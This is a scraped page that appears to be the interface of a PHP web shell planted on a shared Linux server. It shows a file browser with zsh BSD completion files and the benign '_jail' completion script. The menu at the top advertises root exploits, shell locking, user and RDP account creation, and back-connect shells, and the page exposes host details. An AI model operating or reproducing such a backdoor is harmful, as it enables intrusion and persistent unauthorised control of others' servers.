Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.20
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
share /
zsh /
functions /
Completion /
BSD /
[ HOME SHELL ]
Name
Size
Permission
Action
_bsd_disks
470
B
-rw-r--r--
_bsd_pkg
8.65
KB
-rw-r--r--
_bsdconfig
2.33
KB
-rw-r--r--
_bsdinstall
1.89
KB
-rw-r--r--
_chflags
574
B
-rw-r--r--
_csup
1.1
KB
-rw-r--r--
_cu
2.51
KB
-rw-r--r--
_cvsup
937
B
-rw-r--r--
_fbsd_architectures
142
B
-rw-r--r--
_fbsd_device_types
934
B
-rw-r--r--
_fetch
3.16
KB
-rw-r--r--
_file_flags
1.5
KB
-rw-r--r--
_freebsd-update
1.12
KB
-rw-r--r--
_fstat
530
B
-rw-r--r--
_fw_update
294
B
-rw-r--r--
_gstat
490
B
-rw-r--r--
_jail
2.41
KB
-rw-r--r--
_jails
747
B
-rw-r--r--
_jexec
544
B
-rw-r--r--
_jls
705
B
-rw-r--r--
_jot
2.47
KB
-rw-r--r--
_kld
1
KB
-rw-r--r--
_ldap
2.19
KB
-rw-r--r--
_mixerctl
577
B
-rw-r--r--
_nbsd_architectures
502
B
-rw-r--r--
_obsd_architectures
178
B
-rw-r--r--
_pfctl
4.78
KB
-rw-r--r--
_pkgin
2.59
KB
-rw-r--r--
_portaudit
563
B
-rw-r--r--
_portlint
748
B
-rw-r--r--
_portmaster
3.89
KB
-rw-r--r--
_portsnap
1.03
KB
-rw-r--r--
_powerd
743
B
-rw-r--r--
_procstat
1.03
KB
-rw-r--r--
_rcctl
1.02
KB
-rw-r--r--
_signify
1.37
KB
-rw-r--r--
_sockstat
1.33
KB
-rw-r--r--
_sysrc
2.9
KB
-rw-r--r--
_systat
2.85
KB
-rw-r--r--
_vmctl
2.87
KB
-rw-r--r--
_watch-snoop
396
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _jail
#compdef jail local curcontext="$curcontext" ret=1 local -a state state_descr line jails running alts suf local -A opt_args _arguments -C -s \ '-c[create a new jail]' \ '-m[modify an existing jail]' \ '-r[remove specified jail]' \ '-d[allow changes to a dying jail]' \ '-f+[specify configuration file]:config file [/etc/jail.conf]:_files' \ '-h[resolve host.hostname and use IP addresses for the jail]' \ '(-q)-i[output jail ID of new jails]' \ '-J+[write a file containing parameters used to start the jail]:file:_files' \ '-p+[limit the number of commands from exec.* that can run simultaneously]:limit' \ '(-i -v)-q[suppress the message printed when a jail is created, modified or removed]' \ '-R[remove jail without using the configuration file]' \ '(-q)-v[print a message on every operation]' \ '!-n+:name' '!-l' '!-s+:secure level' \!-{u,U}'+:user:_users' \ '*:: :->args' && ret=0 if [[ -n $state ]]; then if compset -P 1 '(^name)='; then case ${IPREFIX%=} in command|exec.*st(art|op)*) _cmdstring && ret=0 ;; depend) _jails && ret=0 ;; path) _directories && ret=0 ;; host|vnet) alts=( 'values:value:(inherit new)' ) ;; ip[46]) alts=( 'values:value:(inherit new disable)' ) ;; *_user) _users && ret=0 ;; *) _message -e values 'value' ;; esac elif compset -P name= || [[ $#line = 1 ]]; then if (( $+opt_args[-r] || $+opt_args[-m] )); then alts=( 'jails:jail:_jails' ) elif (( $+opt_args[-c] )); then running=( ${${(f)"$(_call_program jails jls name)"}/ /:} ) jails=( ${${(M)${(f)"$(<${opt_args[-f]:-/etc/jail.conf})"}:#[a-z]# #\{#(#e)}%% *} ) alts=( "jails:jail:compadd - ${jails:|running}" ) fi fi if [[ -z $IPREFIX ]]; then compset -S '=*' || suf=( -qS = ) alts+=( 'parameters:parameter:compadd -r "\n\t\- =" - persist allow.{set_hostname,sysvipc,raw_sockets,chflags,mount{,.devfs,.fdescfs,.nullfs,.procfs,.linprocfs,.linsysfs,.tmpfs,.zfs},quotas,socket_af} mount.{devfs,fdescfs,procfs}' 'parameters:parameter:compadd $suf - jid name path ip{4,6}{,.addr{,sel}} vnet host.hostname host securelevel devfs_ruleset children.{max,cur} enforce_statfs cpuset.id osrelease osreldate command exec.{{,pre,post}{start,stop},clean,jail_user,system{,_jail}_user,timeout,consolelog,fib} stop.timeout {vnet.,}interface ip_hostname mount{,.fstab} depend' ) fi (( $#alts )) && _alternative $alts && ret=0 fi return ret
Close